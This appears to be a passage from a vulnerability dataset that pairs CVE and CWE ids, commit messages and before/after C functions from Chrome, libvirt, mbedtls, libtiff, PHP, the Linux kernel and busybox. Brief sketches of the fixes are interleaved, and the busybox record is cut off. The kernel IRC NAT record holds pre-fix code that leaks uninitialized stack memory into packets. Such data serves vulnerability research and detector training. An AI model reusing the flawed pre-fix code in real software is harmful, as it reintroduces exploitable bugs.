static bool CheckEac3(const uint8* buffer, int buffer_size) { RCHECK(buffer_size > 6); int offset = 0; while (offset + 6 < buffer_size) { BitReader reader(buffer + offset, 6); RCHECK(ReadBits(&reader, 16) == kAc3SyncWord); RCHECK(ReadBits(&reader, 2) != 3); reader.SkipBits(3); int frame_size = (ReadBits(&reader, 11) + 1) * 2; RCHECK(frame_size >= 7); reader.SkipBits(2 + 2 + 3 + 1); int bit_stream_id = ReadBits(&reader, 5); RCHECK(bit_stream_id >= 11 && bit_stream_id <= 16); offset += frame_size; } return true; }
static bool CheckEac3(const uint8* buffer, int buffer_size) { RCHECK(buffer_size > 6); int offset = 0; while (offset + 6 < buffer_size) { BitReader reader(buffer + offset, 6); RCHECK(ReadBits(&reader, 16) == kAc3SyncWord); RCHECK(ReadBits(&reader, 2) != 3); reader.SkipBits(3); int frame_size = (ReadBits(&reader, 11) + 1) * 2; RCHECK(frame_size >= 7); reader.SkipBits(2 + 2 + 3 + 1); int bit_stream_id = ReadBits(&reader, 5); RCHECK(bit_stream_id >= 11 && bit_stream_id <= 16); offset += frame_size; } return true; }
C
Chrome
0
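The one-line commit message for CVE-2014-7908 above ("Add extra checks to avoid integer overflow") points at a common parser bug: advancing an int offset by a parsed frame size can wrap before the loop condition ever sees it. A minimal sketch of the kind of guard meant here, with a hypothetical helper name rather than the Chromium patch itself:

#include <limits.h>
#include <stdbool.h>

/* Advance the parse offset by frame_size only if the addition cannot
 * wrap and stays inside the buffer. Illustrative helper. */
static bool advance_offset(int *offset, int frame_size, int buffer_size)
{
    if (frame_size <= 0 || *offset > INT_MAX - frame_size)
        return false;               /* would overflow a signed int */
    if (*offset + frame_size > buffer_size)
        return false;               /* would run past the buffer */
    *offset += frame_size;
    return true;
}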
CVE-2016-10746
https://www.cvedetails.com/cve/CVE-2016-10746/
CWE-254
https://github.com/libvirt/libvirt/commit/506e9d6c2d4baaf580d489fff0690c0ff2ff588f
506e9d6c2d4baaf580d489fff0690c0ff2ff588f
virDomainGetTime: Deny on RO connections We have a policy that if an API may end up talking to a guest agent it should require an RW connection. We don't obey the rule in virDomainGetTime(). Signed-off-by: Michal Privoznik <[email protected]>
virDomainPMSuspendForDuration(virDomainPtr dom, unsigned int target, unsigned long long duration, unsigned int flags) { virConnectPtr conn; VIR_DOMAIN_DEBUG(dom, "target=%u duration=%llu flags=%x", target, duration, flags); virResetLastError(); virCheckDomainReturn(dom, -1); conn = dom->conn; virCheckReadOnlyGoto(conn->flags, error); if (conn->driver->domainPMSuspendForDuration) { int ret; ret = conn->driver->domainPMSuspendForDuration(dom, target, duration, flags); if (ret < 0) goto error; return ret; } virReportUnsupportedError(); error: virDispatchError(conn); return -1; }
virDomainPMSuspendForDuration(virDomainPtr dom, unsigned int target, unsigned long long duration, unsigned int flags) { virConnectPtr conn; VIR_DOMAIN_DEBUG(dom, "target=%u duration=%llu flags=%x", target, duration, flags); virResetLastError(); virCheckDomainReturn(dom, -1); conn = dom->conn; virCheckReadOnlyGoto(conn->flags, error); if (conn->driver->domainPMSuspendForDuration) { int ret; ret = conn->driver->domainPMSuspendForDuration(dom, target, duration, flags); if (ret < 0) goto error; return ret; } virReportUnsupportedError(); error: virDispatchError(conn); return -1; }
C
libvirt
0
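The fix the commit message describes presumably mirrors the pattern visible in virDomainPMSuspendForDuration() in this record: reject read-only connections before dispatching to the driver. An abbreviated sketch of what the added check plausibly looks like in virDomainGetTime(), reconstructed from the adjacent function rather than copied from the actual libvirt patch:

int
virDomainGetTime(virDomainPtr dom, long long *seconds,
                 unsigned int *nseconds, unsigned int flags)
{
    virConnectPtr conn;

    virResetLastError();
    virCheckDomainReturn(dom, -1);
    conn = dom->conn;

    virCheckReadOnlyGoto(conn->flags, error);   /* the added check */

    if (conn->driver->domainGetTime) {
        int ret = conn->driver->domainGetTime(dom, seconds, nseconds, flags);
        if (ret < 0)
            goto error;
        return ret;
    }

    virReportUnsupportedError();
 error:
    virDispatchError(conn);
    return -1;
}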
CVE-2017-14032
https://www.cvedetails.com/cve/CVE-2017-14032/
CWE-287
https://github.com/ARMmbed/mbedtls/commit/d15795acd5074e0b44e71f7ede8bdfe1b48591fc
d15795acd5074e0b44e71f7ede8bdfe1b48591fc
Improve behaviour on fatal errors If we didn't walk the whole chain, then there may be any kind of error in the part of the chain we didn't check, so setting all flags looks like the safe thing to do.
static int x509_info_ext_key_usage( char **buf, size_t *size, const mbedtls_x509_sequence *extended_key_usage ) { int ret; const char *desc; size_t n = *size; char *p = *buf; const mbedtls_x509_sequence *cur = extended_key_usage; const char *sep = ""; while( cur != NULL ) { if( mbedtls_oid_get_extended_key_usage( &cur->buf, &desc ) != 0 ) desc = "???"; ret = mbedtls_snprintf( p, n, "%s%s", sep, desc ); MBEDTLS_X509_SAFE_SNPRINTF; sep = ", "; cur = cur->next; } *size = n; *buf = p; return( 0 ); }
static int x509_info_ext_key_usage( char **buf, size_t *size, const mbedtls_x509_sequence *extended_key_usage ) { int ret; const char *desc; size_t n = *size; char *p = *buf; const mbedtls_x509_sequence *cur = extended_key_usage; const char *sep = ""; while( cur != NULL ) { if( mbedtls_oid_get_extended_key_usage( &cur->buf, &desc ) != 0 ) desc = "???"; ret = mbedtls_snprintf( p, n, "%s%s", sep, desc ); MBEDTLS_X509_SAFE_SNPRINTF; sep = ", "; cur = cur->next; } *size = n; *buf = p; return( 0 ); }
C
mbedtls
0
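The reasoning in the mbedtls commit message above translates into a small, conservative rule: when verification aborts before the whole chain was inspected, report every failure flag rather than a partial result. A minimal sketch of that behaviour, as a hypothetical wrapper and not the actual mbedtls patch:

#include <stdint.h>

/* If the chain walk hit a fatal error, anything may be wrong in the
 * part we never checked, so set all MBEDTLS_X509_BADCERT_* style bits. */
static int finish_verify(int walk_ret, uint32_t *flags)
{
    if (walk_ret != 0) {
        *flags = (uint32_t) -1;   /* conservative: every flag set */
        return walk_ret;
    }
    return 0;   /* flags already reflect the checks that actually ran */
}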
CVE-2013-0838
https://www.cvedetails.com/cve/CVE-2013-0838/
CWE-264
https://github.com/chromium/chromium/commit/0bd1a6ddb5fb23dfea3e72d60e5e8df4cf5826bc
0bd1a6ddb5fb23dfea3e72d60e5e8df4cf5826bc
Make shared memory segments writable only by their rightful owners. BUG=143859 TEST=Chrome's UI still works on Linux and Chrome OS Review URL: https://chromiumcodereview.appspot.com/10854242 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@158289 0039d316-1c4b-4281-b951-d872f2087c98
bool Enabled() { return loaded_extension_; }
bool Enabled() { return loaded_extension_; }
C
Chrome
0
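The CVE-2013-0838 commit title above ("Make shared memory segments writable only by their rightful owners") comes down to creating SysV segments with owner-only permission bits. A generic POSIX sketch of the principle, not the Chromium change itself:

#include <stddef.h>
#include <sys/ipc.h>
#include <sys/shm.h>

/* Create a segment readable/writable only by the owning uid (0600)
 * instead of world-writable (0666). */
static int create_private_segment(size_t size)
{
    return shmget(IPC_PRIVATE, size, IPC_CREAT | 0600);
}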
CVE-2013-4244
https://www.cvedetails.com/cve/CVE-2013-4244/
CWE-119
https://github.com/vadz/libtiff/commit/ce6841d9e41d621ba23cf18b190ee6a23b2cc833
ce6841d9e41d621ba23cf18b190ee6a23b2cc833
fix possible OOB write in gif2tiff.c
convert(void) { int ch; char* mode = "w"; if (!checksignature()) return (-1); readscreen(); while ((ch = getc(infile)) != ';' && ch != EOF) { switch (ch) { case '\0': break; /* this kludge for non-standard files */ case ',': if (!readgifimage(mode)) return (-1); mode = "a"; /* subsequent images append */ break; case '!': readextension(); break; default: fprintf(stderr, "illegal GIF block type\n"); return (-1); } } return (0); }
convert(void) { int ch; char* mode = "w"; if (!checksignature()) return (-1); readscreen(); while ((ch = getc(infile)) != ';' && ch != EOF) { switch (ch) { case '\0': break; /* this kludge for non-standard files */ case ',': if (!readgifimage(mode)) return (-1); mode = "a"; /* subsequent images append */ break; case '!': readextension(); break; default: fprintf(stderr, "illegal GIF block type\n"); return (-1); } } return (0); }
C
libtiff
0
CVE-2016-1633
https://www.cvedetails.com/cve/CVE-2016-1633/
null
https://github.com/chromium/chromium/commit/eb750a539e4856ba9042abdf39ae9da58fa3ae63
eb750a539e4856ba9042abdf39ae9da58fa3ae63
Fix detached Attr nodes interaction with NodeIterator - Don't register NodeIterator to document when attaching to Attr node. -- NodeIterator is registered to its document to receive updateForNodeRemoval notifications. -- However it wouldn't make sense on Attr nodes, as they never have children. BUG=572537 Review URL: https://codereview.chromium.org/1577213003 Cr-Commit-Position: refs/heads/master@{#369687}
bool NodeIterator::NodePointer::moveToPrevious(Node* root) { if (!node) return false; if (!isPointerBeforeNode) { isPointerBeforeNode = true; return true; } node = NodeTraversal::previous(*node, root); return node; }
bool NodeIterator::NodePointer::moveToPrevious(Node* root) { if (!node) return false; if (!isPointerBeforeNode) { isPointerBeforeNode = true; return true; } node = NodeTraversal::previous(*node, root); return node; }
C
Chrome
0
CVE-2015-1274
https://www.cvedetails.com/cve/CVE-2015-1274/
CWE-254
https://github.com/chromium/chromium/commit/d27468a832d5316884bd02f459cbf493697fd7e1
d27468a832d5316884bd02f459cbf493697fd7e1
Switch to equalIgnoringASCIICase throughout modules/accessibility BUG=627682 Review-Url: https://codereview.chromium.org/2793913007 Cr-Commit-Position: refs/heads/master@{#461858}
bool AXObject::computeIsInertOrAriaHidden( IgnoredReasons* ignoredReasons) const { if (getNode()) { if (getNode()->isInert()) { if (ignoredReasons) { HTMLDialogElement* dialog = getActiveDialogElement(getNode()); if (dialog) { AXObject* dialogObject = axObjectCache().getOrCreate(dialog); if (dialogObject) ignoredReasons->push_back( IgnoredReason(AXActiveModalDialog, dialogObject)); else ignoredReasons->push_back(IgnoredReason(AXInert)); } else { ignoredReasons->push_back(IgnoredReason(AXInert)); } } return true; } } else { AXObject* parent = parentObject(); if (parent && parent->isInertOrAriaHidden()) { if (ignoredReasons) parent->computeIsInertOrAriaHidden(ignoredReasons); return true; } } const AXObject* hiddenRoot = ariaHiddenRoot(); if (hiddenRoot) { if (ignoredReasons) { if (hiddenRoot == this) ignoredReasons->push_back(IgnoredReason(AXAriaHidden)); else ignoredReasons->push_back(IgnoredReason(AXAriaHiddenRoot, hiddenRoot)); } return true; } return false; }
bool AXObject::computeIsInertOrAriaHidden( IgnoredReasons* ignoredReasons) const { if (getNode()) { if (getNode()->isInert()) { if (ignoredReasons) { HTMLDialogElement* dialog = getActiveDialogElement(getNode()); if (dialog) { AXObject* dialogObject = axObjectCache().getOrCreate(dialog); if (dialogObject) ignoredReasons->push_back( IgnoredReason(AXActiveModalDialog, dialogObject)); else ignoredReasons->push_back(IgnoredReason(AXInert)); } else { ignoredReasons->push_back(IgnoredReason(AXInert)); } } return true; } } else { AXObject* parent = parentObject(); if (parent && parent->isInertOrAriaHidden()) { if (ignoredReasons) parent->computeIsInertOrAriaHidden(ignoredReasons); return true; } } const AXObject* hiddenRoot = ariaHiddenRoot(); if (hiddenRoot) { if (ignoredReasons) { if (hiddenRoot == this) ignoredReasons->push_back(IgnoredReason(AXAriaHidden)); else ignoredReasons->push_back(IgnoredReason(AXAriaHiddenRoot, hiddenRoot)); } return true; } return false; }
C
Chrome
0
CVE-2016-3078
https://www.cvedetails.com/cve/CVE-2016-3078/
CWE-190
https://github.com/php/php-src/commit/3b8d4de300854b3517c7acb239b84f7726c1353c?w=1
3b8d4de300854b3517c7acb239b84f7726c1353c?w=1
Fix bug #71923 - integer overflow in ZipArchive::getFrom*
static zend_object *php_zip_object_new(zend_class_entry *class_type) /* {{{ */ { ze_zip_object *intern; intern = ecalloc(1, sizeof(ze_zip_object) + zend_object_properties_size(class_type)); intern->prop_handler = &zip_prop_handlers; zend_object_std_init(&intern->zo, class_type); object_properties_init(&intern->zo, class_type); intern->zo.handlers = &zip_object_handlers; return &intern->zo; } /* }}} */
static zend_object *php_zip_object_new(zend_class_entry *class_type) /* {{{ */ { ze_zip_object *intern; intern = ecalloc(1, sizeof(ze_zip_object) + zend_object_properties_size(class_type)); intern->prop_handler = &zip_prop_handlers; zend_object_std_init(&intern->zo, class_type); object_properties_init(&intern->zo, class_type); intern->zo.handlers = &zip_object_handlers; return &intern->zo; } /* }}} */
C
php-src
0
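Bug #71923 behind CVE-2016-3078 is a classic length-check overflow: an attacker-influenced length added to an offset wraps, so a naive "offset + len <= size" test passes. A minimal sketch of the overflow-safe form of that comparison (illustrative, not the php-src patch):

#include <stdbool.h>
#include <stddef.h>

/* Validate [offset, offset + len) against entry_size without computing
 * offset + len, which could wrap around. */
static bool range_ok(size_t entry_size, size_t offset, size_t len)
{
    return offset <= entry_size && len <= entry_size - offset;
}

Rewriting the comparison as a subtraction on the known-larger side is the standard idiom, since it can never overflow for unsigned operands.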
CVE-2013-0921
https://www.cvedetails.com/cve/CVE-2013-0921/
CWE-264
https://github.com/chromium/chromium/commit/e9841fbdaf41b4a2baaa413f94d5c0197f9261f4
e9841fbdaf41b4a2baaa413f94d5c0197f9261f4
Ensure extensions and the Chrome Web Store are loaded in new BrowsingInstances. BUG=174943 TEST=Can't post message to CWS. See bug for repro steps. Review URL: https://chromiumcodereview.appspot.com/12301013 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@184208 0039d316-1c4b-4281-b951-d872f2087c98
bool ChromeContentBrowserClient::AllowSaveLocalState( content::ResourceContext* context) { DCHECK(BrowserThread::CurrentlyOn(BrowserThread::IO)); ProfileIOData* io_data = ProfileIOData::FromResourceContext(context); CookieSettings* cookie_settings = io_data->GetCookieSettings(); ContentSetting setting = cookie_settings->GetDefaultCookieSetting(NULL); return setting != CONTENT_SETTING_SESSION_ONLY; }
bool ChromeContentBrowserClient::AllowSaveLocalState( content::ResourceContext* context) { DCHECK(BrowserThread::CurrentlyOn(BrowserThread::IO)); ProfileIOData* io_data = ProfileIOData::FromResourceContext(context); CookieSettings* cookie_settings = io_data->GetCookieSettings(); ContentSetting setting = cookie_settings->GetDefaultCookieSetting(NULL); return setting != CONTENT_SETTING_SESSION_ONLY; }
C
Chrome
0
CVE-2015-1281
https://www.cvedetails.com/cve/CVE-2015-1281/
CWE-254
https://github.com/chromium/chromium/commit/dff368031150a1033a1a3c913f8857679a0279be
dff368031150a1033a1a3c913f8857679a0279be
Correctly keep track of isolates for microtask execution BUG=487155 [email protected] Review URL: https://codereview.chromium.org/1161823002 git-svn-id: svn://svn.chromium.org/blink/trunk@195985 bbb929c8-8fbe-4397-9dbb-9b2b20218538
void cancelTask() { m_taskCanceled = true; }
void cancelTask() { m_taskCanceled = true; }
C
Chrome
0
CVE-2014-1690
https://www.cvedetails.com/cve/CVE-2014-1690/
CWE-119
https://github.com/torvalds/linux/commit/2690d97ade05c5325cbf7c72b94b90d265659886
2690d97ade05c5325cbf7c72b94b90d265659886
netfilter: nf_nat: fix access to uninitialized buffer in IRC NAT helper Commit 5901b6be885e attempted to introduce IPv6 support into IRC NAT helper. By doing so, the following code seemed to be removed by accident: ip = ntohl(exp->master->tuplehash[IP_CT_DIR_REPLY].tuple.dst.u3.ip); sprintf(buffer, "%u %u", ip, port); pr_debug("nf_nat_irc: inserting '%s' == %pI4, port %u\n", buffer, &ip, port); This leads to the fact that buffer[] was left uninitialized and contained some stack value. When we call nf_nat_mangle_tcp_packet(), we call strlen(buffer) on exactly this uninitialized buffer. If we are unlucky and the skb has enough tailroom, we overwrite or leak values that sit on our stack into the packet and send that out to the receiver. Since the rather informal DCC spec [1] does not seem to specify IPv6 support right now, we log such occurrences so that admins can act accordingly, and drop the packet. I've looked into XChat source, and IPv6 is not supported there: addresses are kept in a u32 and printed via a %u format string. Therefore, restore old behaviour as in IPv4, use snprintf(). The IRC helper does not support IPv6 for now. By this, we can safely use strlen(buffer) in nf_nat_mangle_tcp_packet() and prevent a buffer overflow. Also simplify some code as we now have a ct variable anyway. [1] http://www.irchelp.org/irchelp/rfc/ctcpspec.html Fixes: 5901b6be885e ("netfilter: nf_nat: support IPv6 in IRC NAT helper") Signed-off-by: Daniel Borkmann <[email protected]> Cc: Harald Welte <[email protected]> Signed-off-by: Pablo Neira Ayuso <[email protected]>
static unsigned int help(struct sk_buff *skb, enum ip_conntrack_info ctinfo, unsigned int protoff, unsigned int matchoff, unsigned int matchlen, struct nf_conntrack_expect *exp) { char buffer[sizeof("4294967296 65635")]; struct nf_conn *ct = exp->master; union nf_inet_addr newaddr; u_int16_t port; unsigned int ret; /* Reply comes from server. */ newaddr = ct->tuplehash[IP_CT_DIR_REPLY].tuple.dst.u3; exp->saved_proto.tcp.port = exp->tuple.dst.u.tcp.port; exp->dir = IP_CT_DIR_REPLY; exp->expectfn = nf_nat_follow_master; /* Try to get same port: if not, try to change it. */ for (port = ntohs(exp->saved_proto.tcp.port); port != 0; port++) { int ret; exp->tuple.dst.u.tcp.port = htons(port); ret = nf_ct_expect_related(exp); if (ret == 0) break; else if (ret != -EBUSY) { port = 0; break; } } if (port == 0) { nf_ct_helper_log(skb, ct, "all ports in use"); return NF_DROP; } /* strlen("\1DCC CHAT chat AAAAAAAA P\1\n")=27 * strlen("\1DCC SCHAT chat AAAAAAAA P\1\n")=28 * strlen("\1DCC SEND F AAAAAAAA P S\1\n")=26 * strlen("\1DCC MOVE F AAAAAAAA P S\1\n")=26 * strlen("\1DCC TSEND F AAAAAAAA P S\1\n")=27 * * AAAAAAAAA: bound addr (1.0.0.0==16777216, min 8 digits, * 255.255.255.255==4294967296, 10 digits) * P: bound port (min 1 d, max 5d (65635)) * F: filename (min 1 d ) * S: size (min 1 d ) * 0x01, \n: terminators */ /* AAA = "us", ie. where server normally talks to. */ snprintf(buffer, sizeof(buffer), "%u %u", ntohl(newaddr.ip), port); pr_debug("nf_nat_irc: inserting '%s' == %pI4, port %u\n", buffer, &newaddr.ip, port); ret = nf_nat_mangle_tcp_packet(skb, ct, ctinfo, protoff, matchoff, matchlen, buffer, strlen(buffer)); if (ret != NF_ACCEPT) { nf_ct_helper_log(skb, ct, "cannot mangle packet"); nf_ct_unexpect_related(exp); } return ret; }
static unsigned int help(struct sk_buff *skb, enum ip_conntrack_info ctinfo, unsigned int protoff, unsigned int matchoff, unsigned int matchlen, struct nf_conntrack_expect *exp) { char buffer[sizeof("4294967296 65635")]; u_int16_t port; unsigned int ret; /* Reply comes from server. */ exp->saved_proto.tcp.port = exp->tuple.dst.u.tcp.port; exp->dir = IP_CT_DIR_REPLY; exp->expectfn = nf_nat_follow_master; /* Try to get same port: if not, try to change it. */ for (port = ntohs(exp->saved_proto.tcp.port); port != 0; port++) { int ret; exp->tuple.dst.u.tcp.port = htons(port); ret = nf_ct_expect_related(exp); if (ret == 0) break; else if (ret != -EBUSY) { port = 0; break; } } if (port == 0) { nf_ct_helper_log(skb, exp->master, "all ports in use"); return NF_DROP; } ret = nf_nat_mangle_tcp_packet(skb, exp->master, ctinfo, protoff, matchoff, matchlen, buffer, strlen(buffer)); if (ret != NF_ACCEPT) { nf_ct_helper_log(skb, exp->master, "cannot mangle packet"); nf_ct_unexpect_related(exp); } return ret; }
C
linux
1
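The CVE-2014-1690 record above shows the fix in full: format the payload into buffer[] with snprintf() before nf_nat_mangle_tcp_packet() takes strlen() of it. A standalone toy illustrating just that core step outside the kernel, with hypothetical values:

#include <stdio.h>
#include <string.h>

int main(void)
{
    char buffer[sizeof("4294967296 65635")];
    unsigned int ip = 16777216u;    /* 1.0.0.0 as a host-order integer */
    unsigned int port = 6667u;

    /* Without this write, strlen(buffer) below would walk stack garbage. */
    snprintf(buffer, sizeof(buffer), "%u %u", ip, port);
    printf("payload '%s' (%zu bytes)\n", buffer, strlen(buffer));
    return 0;
}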
CVE-2013-6644
https://www.cvedetails.com/cve/CVE-2013-6644/
null
https://github.com/chromium/chromium/commit/db93178bcaaf7e99ebb18bd51fa99b2feaf47e1f
db93178bcaaf7e99ebb18bd51fa99b2feaf47e1f
[Extensions] Add GetInstalledExtension() method to ExtensionRegistry This CL adds GetInstalledExtension() method to ExtensionRegistry and uses it instead of deprecated ExtensionService::GetInstalledExtension() in chrome/browser/ui/app_list/. Part of removing the deprecated GetInstalledExtension() call from the ExtensionService. BUG=489687 Review URL: https://codereview.chromium.org/1130353010 Cr-Commit-Position: refs/heads/master@{#333036}
const Extension* ExtensionRegistry::GetExtensionById(const std::string& id, int include_mask) const { std::string lowercase_id = base::StringToLowerASCII(id); if (include_mask & ENABLED) { const Extension* extension = enabled_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & DISABLED) { const Extension* extension = disabled_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & TERMINATED) { const Extension* extension = terminated_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & BLACKLISTED) { const Extension* extension = blacklisted_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & BLOCKED) { const Extension* extension = blocked_extensions_.GetByID(lowercase_id); if (extension) return extension; } return NULL; }
const Extension* ExtensionRegistry::GetExtensionById(const std::string& id, int include_mask) const { std::string lowercase_id = base::StringToLowerASCII(id); if (include_mask & ENABLED) { const Extension* extension = enabled_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & DISABLED) { const Extension* extension = disabled_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & TERMINATED) { const Extension* extension = terminated_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & BLACKLISTED) { const Extension* extension = blacklisted_extensions_.GetByID(lowercase_id); if (extension) return extension; } if (include_mask & BLOCKED) { const Extension* extension = blocked_extensions_.GetByID(lowercase_id); if (extension) return extension; } return NULL; }
C
Chrome
0
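Given the GetExtensionById() shown in this record, the GetInstalledExtension() helper the commit message adds plausibly reduces to a lookup across every extension set. A one-function sketch inferred from the commit message and the code above, not verified against the actual CL:

// EVERYTHING is ExtensionRegistry's include_mask covering all sets
// (enabled, disabled, terminated, blacklisted, blocked).
const Extension* ExtensionRegistry::GetInstalledExtension(
    const std::string& id) const {
  return GetExtensionById(id, ExtensionRegistry::EVERYTHING);
}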
CVE-2016-2148
https://www.cvedetails.com/cve/CVE-2016-2148/
CWE-119
https://git.busybox.net/busybox/commit/?id=352f79acbd759c14399e39baef21fc4ffe180ac2
352f79acbd759c14399e39baef21fc4ffe180ac2
null
int udhcpc_main(int argc UNUSED_PARAM, char **argv) { uint8_t *message; const char *str_V, *str_h, *str_F, *str_r; IF_FEATURE_UDHCPC_ARPING(const char *str_a = "2000";) IF_FEATURE_UDHCP_PORT(char *str_P;) void *clientid_mac_ptr; llist_t *list_O = NULL; llist_t *list_x = NULL; int tryagain_timeout = 20; int discover_timeout = 3; int discover_retries = 3; uint32_t server_addr = server_addr; /* for compiler */ uint32_t requested_ip = 0; uint32_t xid = xid; /* for compiler */ int packet_num; int timeout; /* must be signed */ unsigned already_waited_sec; unsigned opt; IF_FEATURE_UDHCPC_ARPING(unsigned arpping_ms;) int max_fd; int retval; fd_set rfds; /* Default options */ IF_FEATURE_UDHCP_PORT(SERVER_PORT = 67;) IF_FEATURE_UDHCP_PORT(CLIENT_PORT = 68;) client_config.interface = "eth0"; client_config.script = CONFIG_UDHCPC_DEFAULT_SCRIPT; str_V = "udhcp "BB_VER; /* Parse command line */ /* O,x: list; -T,-t,-A take numeric param */ opt_complementary = "O::x::T+:t+:A+" IF_UDHCP_VERBOSE(":vv") ; IF_LONG_OPTS(applet_long_options = udhcpc_longopts;) opt = getopt32(argv, "CV:H:h:F:i:np:qRr:s:T:t:SA:O:ox:fB" USE_FOR_MMU("b") IF_FEATURE_UDHCPC_ARPING("a::") IF_FEATURE_UDHCP_PORT("P:") "v" , &str_V, &str_h, &str_h, &str_F , &client_config.interface, &client_config.pidfile, &str_r /* i,p */ , &client_config.script /* s */ , &discover_timeout, &discover_retries, &tryagain_timeout /* T,t,A */ , &list_O , &list_x IF_FEATURE_UDHCPC_ARPING(, &str_a) IF_FEATURE_UDHCP_PORT(, &str_P) IF_UDHCP_VERBOSE(, &dhcp_verbose) ); if (opt & (OPT_h|OPT_H)) { bb_error_msg("option -h NAME is deprecated, use -x hostname:NAME"); client_config.hostname = alloc_dhcp_option(DHCP_HOST_NAME, str_h, 0); } if (opt & OPT_F) { /* FQDN option format: [0x51][len][flags][0][0]<fqdn> */ client_config.fqdn = alloc_dhcp_option(DHCP_FQDN, str_F, 3); /* Flag bits: 0000NEOS * S: 1 = Client requests server to update A RR in DNS as well as PTR * O: 1 = Server indicates to client that DNS has been updated regardless * E: 1 = Name is in DNS format, i.e. <4>host<6>domain<3>com<0>, * not "host.domain.com". Format 0 is obsolete. * N: 1 = Client requests server to not update DNS (S must be 0 then) * Two [0] bytes which follow are deprecated and must be 0. 
*/ client_config.fqdn[OPT_DATA + 0] = 0x1; /*client_config.fqdn[OPT_DATA + 1] = 0; - xzalloc did it */ /*client_config.fqdn[OPT_DATA + 2] = 0; */ } if (opt & OPT_r) requested_ip = inet_addr(str_r); #if ENABLE_FEATURE_UDHCP_PORT if (opt & OPT_P) { CLIENT_PORT = xatou16(str_P); SERVER_PORT = CLIENT_PORT - 1; } #endif IF_FEATURE_UDHCPC_ARPING(arpping_ms = xatou(str_a);) while (list_O) { char *optstr = llist_pop(&list_O); unsigned n = bb_strtou(optstr, NULL, 0); if (errno || n > 254) { n = udhcp_option_idx(optstr); n = dhcp_optflags[n].code; } client_config.opt_mask[n >> 3] |= 1 << (n & 7); } if (!(opt & OPT_o)) { unsigned i, n; for (i = 0; (n = dhcp_optflags[i].code) != 0; i++) { if (dhcp_optflags[i].flags & OPTION_REQ) { client_config.opt_mask[n >> 3] |= 1 << (n & 7); } } } while (list_x) { char *optstr = llist_pop(&list_x); char *colon = strchr(optstr, ':'); if (colon) *colon = ' '; /* now it looks similar to udhcpd's config file line: * "optname optval", using the common routine: */ udhcp_str2optset(optstr, &client_config.options); } if (udhcp_read_interface(client_config.interface, &client_config.ifindex, NULL, client_config.client_mac) ) { return 1; } clientid_mac_ptr = NULL; if (!(opt & OPT_C) && !udhcp_find_option(client_config.options, DHCP_CLIENT_ID)) { /* not suppressed and not set, set the default client ID */ client_config.clientid = alloc_dhcp_option(DHCP_CLIENT_ID, "", 7); client_config.clientid[OPT_DATA] = 1; /* type: ethernet */ clientid_mac_ptr = client_config.clientid + OPT_DATA+1; memcpy(clientid_mac_ptr, client_config.client_mac, 6); } if (str_V[0] != '\0') { client_config.vendorclass = alloc_dhcp_option(DHCP_VENDOR, str_V, 0); } #if !BB_MMU /* on NOMMU reexec (i.e., background) early */ if (!(opt & OPT_f)) { bb_daemonize_or_rexec(0 /* flags */, argv); logmode = LOGMODE_NONE; } #endif if (opt & OPT_S) { openlog(applet_name, LOG_PID, LOG_DAEMON); logmode |= LOGMODE_SYSLOG; } /* Make sure fd 0,1,2 are open */ bb_sanitize_stdio(); /* Equivalent of doing a fflush after every \n */ setlinebuf(stdout); /* Create pidfile */ write_pidfile(client_config.pidfile); /* Goes to stdout (unless NOMMU) and possibly syslog */ bb_info_msg("%s (v"BB_VER") started", applet_name); /* Set up the signal pipe */ udhcp_sp_setup(); /* We want random_xid to be random... */ srand(monotonic_us()); state = INIT_SELECTING; udhcp_run_script(NULL, "deconfig"); change_listen_mode(LISTEN_RAW); packet_num = 0; timeout = 0; already_waited_sec = 0; /* Main event loop. select() waits on signal pipe and possibly * on sockfd. * "continue" statements in code below jump to the top of the loop. */ for (;;) { struct timeval tv; struct dhcp_packet packet; /* silence "uninitialized!" warning */ unsigned timestamp_before_wait = timestamp_before_wait; /* Was opening raw or udp socket here * if (listen_mode != LISTEN_NONE && sockfd < 0), * but on fast network renew responses return faster * than we open sockets. Thus this code is moved * to change_listen_mode(). Thus we open listen socket * BEFORE we send renew request (see "case BOUND:"). */ max_fd = udhcp_sp_fd_set(&rfds, sockfd); tv.tv_sec = timeout - already_waited_sec; tv.tv_usec = 0; retval = 0; /* If we already timed out, fall through with retval = 0, else... */ if ((int)tv.tv_sec > 0) { log1("Waiting on select %u seconds", (int)tv.tv_sec); timestamp_before_wait = (unsigned)monotonic_sec(); retval = select(max_fd + 1, &rfds, NULL, NULL, &tv); if (retval < 0) { /* EINTR? 
A signal was caught, don't panic */ if (errno == EINTR) { already_waited_sec += (unsigned)monotonic_sec() - timestamp_before_wait; continue; } /* Else: an error occured, panic! */ bb_perror_msg_and_die("select"); } } /* If timeout dropped to zero, time to become active: * resend discover/renew/whatever */ if (retval == 0) { /* When running on a bridge, the ifindex may have changed * (e.g. if member interfaces were added/removed * or if the status of the bridge changed). * Refresh ifindex and client_mac: */ if (udhcp_read_interface(client_config.interface, &client_config.ifindex, NULL, client_config.client_mac) ) { goto ret0; /* iface is gone? */ } if (clientid_mac_ptr) memcpy(clientid_mac_ptr, client_config.client_mac, 6); /* We will restart the wait in any case */ already_waited_sec = 0; switch (state) { case INIT_SELECTING: if (!discover_retries || packet_num < discover_retries) { if (packet_num == 0) xid = random_xid(); /* broadcast */ send_discover(xid, requested_ip); timeout = discover_timeout; packet_num++; continue; } leasefail: udhcp_run_script(NULL, "leasefail"); #if BB_MMU /* -b is not supported on NOMMU */ if (opt & OPT_b) { /* background if no lease */ bb_info_msg("No lease, forking to background"); client_background(); /* do not background again! */ opt = ((opt & ~OPT_b) | OPT_f); } else #endif if (opt & OPT_n) { /* abort if no lease */ bb_info_msg("No lease, failing"); retval = 1; goto ret; } /* wait before trying again */ timeout = tryagain_timeout; packet_num = 0; continue; case REQUESTING: if (!discover_retries || packet_num < discover_retries) { /* send broadcast select packet */ send_select(xid, server_addr, requested_ip); timeout = discover_timeout; packet_num++; continue; } /* Timed out, go back to init state. * "discover...select...discover..." loops * were seen in the wild. Treat them similarly * to "no response to discover" case */ change_listen_mode(LISTEN_RAW); state = INIT_SELECTING; goto leasefail; case BOUND: /* 1/2 lease passed, enter renewing state */ state = RENEWING; client_config.first_secs = 0; /* make secs field count from 